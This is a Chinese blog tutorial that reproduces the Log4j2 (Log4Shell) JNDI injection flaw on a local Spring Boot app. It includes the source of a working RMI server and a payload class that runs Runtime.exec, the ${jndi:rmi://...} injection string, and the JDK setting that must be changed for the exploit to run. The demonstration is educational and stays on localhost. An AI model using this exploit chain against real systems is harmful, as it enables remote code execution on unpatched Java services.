风靡IT圈的史诗级漏洞log4j2的产生原理及复现

风靡IT圈的史诗级漏洞log4j2的产生原理及复现

文章目录

• • 前言
  • 环境准备
  • 攻击代码准备
  • • 一、攻击服务准备
    • 二、攻击代码准备
    • 三、修改本地项目业务代码
  • 攻击效果展示
  • 项目日志打印
  • 结语

前言

注：本文仅供参考学习，不构成任何犯罪引导

相信就在最近两天，不少IT圈的都在因为Log4j2，忙前忙后排查项目吧？

写JAVA的都知道，Log4j是用来记录日志的，它的覆盖率之广以至于此次受影响的范围可以说是核d级别的影响了。

这个漏洞其实是取决于Log4j的一种Lookup机制，就是当我们做日志输出，出现占位符的时候，通过一些特殊的命令符号，可以执行一些程序代码。

接下来我们就来复现所谓的Log4j2是如何执行攻击的，这里博主用本地的项目来给大家复现一下。

环境准备

由于博主的本地项目springBoot版本会自动引入spring-boot-starter-logging依赖，首先我们要对其去除，如下：

        
            org.springframework.boot
            spring-boot-starter-web
            
                
                    org.springframework.boot
                    spring-boot-starter-logging
                
            
        

其次是引入我们的Log4j依赖包，注：受影响的范围为Apache Log4j 2.x <= 2.14.1

        
            org.apache.logging.log4j
            log4j-core
            2.13.3
        
        
            org.apache.logging.log4j
            log4j-api
            2.13.3
        

其次，配置我们的Log4j.xml，就是一个最简单的输出配置，代码如下：

至此漏洞的执行环境就已经配置完毕了。

攻击代码准备 一、攻击服务准备

博主在本地新建一个项目，并编写如下代码，编写完毕以后执行即可。

    public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
        Registry registry = LocateRegistry.createRegistry(1099);

        Reference reference = new Reference("Attack","Attack","http://127.0.0.1:80/");

        ReferenceWrapper wrapper = new ReferenceWrapper(reference);

        registry.bind("obj",wrapper);

        System.out.println("server is running");
    }

如上代码块中Attack就是我们要执行的攻击代码。

启动完成以后就可以一直挂载我们待会使用。

二、攻击代码准备

攻击代码Attack是一个被编译好了的Java文件，也就是一个Class文件。

我们将编译好的攻击class文件放在nginx目录下，纯编译文件，不带你IDEA的路径。如下图：

攻击代码如下，不做真正的攻击，就简单打开一个记事本。代码如下：

public class Attack implements ObjectFactory{

	public Attack(){}
	
	public Object getObjectInstance(Object obj, Name name, Context context, Hashtable hashtable) throws Exception{
		System.out.println("I am coming...");
		
		// 打开本地记事本
		// 实际攻击行为就不用我多说了，大家可以自行脑补
		Process process = Runtime.getRuntime().exec("notepad.exe");
		
		return null;
	}
}

将此代码编译完成以后的class文件放进目录即可。

三、修改本地项目业务代码

我们将本地项目的代码修改为由log4j打印日志输出，这里博主选用的是《杂货铺项目》中注册界面的邮箱验证时，使用log4j去输出日志。具体代码如下：

如上代码，我们为何要设置System.setProperty(“com.sun.jndi.rmi.object.trustURLCodebase”, “true”); ？

这是因为JDK 5 U45,JDK 6 U45,JDK 7u21,JDK 8u121开始java.rmi.server.useCodebaseOnly默认配置已经改为true，不用自行设置。

但是JDK 6u132, JDK 7u122, JDK 8u113开始com.sun.jndi.rmi.object.trustURLCodebase默认值已改为了false。

这里博主用的JDK版本较高，所以必须手动设置一下，如果你的JDK版本较低的话可以忽略。

至于具体原因以及它的作用感兴趣的可以自行了解一下。

攻击效果展示

在邮箱输入框中，我们输入如下参数，${jndi:rmi://127.0.0.1:1099/obj} ，然后点击发送验证码。

执行结果展示为：

项目日志打印

我们再来看看在项目中的日志，你会惊讶地发现，攻击程序已经在你的项目中执行了！

结语

如上原理，攻击者在攻击代码中可以编写任意攻击代码，在对应环境下的任何线上JAVA且使用了Log4j2的项目中执行，你说，恐怖不恐怖？